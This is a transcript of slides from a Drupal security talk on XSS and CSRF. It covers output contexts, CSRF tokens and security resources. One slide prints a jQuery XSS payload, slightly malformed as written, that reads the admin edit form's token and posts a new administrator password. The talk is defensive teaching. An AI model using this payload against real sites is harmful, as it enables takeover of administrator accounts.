drupal security for coders and themers - xss and csrf
TRANSCRIPT
- 1. Your site is vulnerable. (really, it is)
2. I want you: To see the vulnerabilities 3. DisneyPrincessCastle! 4. 5. 6.
- Drupaler for 4 years
7. Drupal Association 8. Help with lots of d.o 9. 20+ modules (Pathauto, token) 10. On Security Team 11. MasteringDrupal.com 12. DrupalDashboard.com 13. @knaddison Greg 14.
- "Cracking Drupal is probably going to be the first Drupal book I buy." - Angie 'webchick' Byron
Wrote a book Or 40% off with Wiley coupon. 15. GVS
- Development
16. Community focused 17. Progressive 18. Event management 19. Now.... 20. Security 21. (with Ben) -> 22. Worry 23. Your site is vulnerable. You can make it safer. 24. A site is secure if private data is kept private, the site cannot be forced ofine or into a degraded mode by a remote visitor, the site resources are used only for their intended purposes, and the site content can be edited only by appropriate users. Some guy Cracking Drupal chapter 1 25.
- Abusing resources
26. Stealing data 27. Altering data 28. Worry in a prioritized way. 29. 30. http://www.cenzic.com/downloads/Cenzic_AppSecTrends_Q1-Q2-2009.pdf 31. Anything you can do XSS can do (better) jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9])"/); var token = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "form_id": 'user_profile_form', "form_token": token, "pass[pass1]": 'hacked', "pass[pass2]": 'hacked' }; jQuery.post(Drupal.settings.basePath +'user/1/edit', payload); } } ); } http://crackingdrupal.com/node/8 32. demo time 33. Tests for XSS
34. Themers
- Read tpl.php and default implementations
35. Rely on your module developer for variables 36. Run the tests 37. Developers Where does this text come from? Is there a way a user can change it? In whatcontextis it being used? 38. 39. Context
- Mail context
40. Database context 41. Web context 42. Server context Take an hour: http://acko.net/blog/safe-string-theory-for-the-web 43. 44. Cross Site Request Forgery
- Taking action
45. Without confirming intent 46. AKA CSRF 47. Cross Site Request Forgery
- Demo time
48. Solutions to CSRF
- Create a token based on something unique to
- site, the user, and the action and
49. validate the token when the action is requested Request:
- 'query' = array('token' => drupal_get_token('my_id');
Processing:
- if (!drupal_valid_token($_GET['token'], 'my_id')) {
- (Or just use the Form API)
50. Security and Usability
- Confirmation forms == teh suck
51. Truly destructive actionsshouldbe hard to do 52. Don't delete, archive and provide undo 53. Choose links or forms for usability, not security 54. Severities and Other Vulnerabilities
- drupal.org/security/contrib lots of other categories of vulnerabilities in addition to XSS and CSRF
55. drupal.org/security-team 56. New Resource...
- http://DrupalSecurityReport.org
Ustima.com 57. Resources
- http://drupal.org/security-team
58. http://drupal.org/security 59. http://drupal.org/writing-secure-code 60. http://groups.drupal.org/node/15254- discussion group 61. http://heine.familiedeelstra.com/ 62. Cracking Drupal -http://crackingdrupal.com 63. http://crackingdrupal.com/node/34- XSS Cheat Sheet 64. http://crackingdrupal.com/node/48- CSRF 65. http://www.drupalsecurityreport.org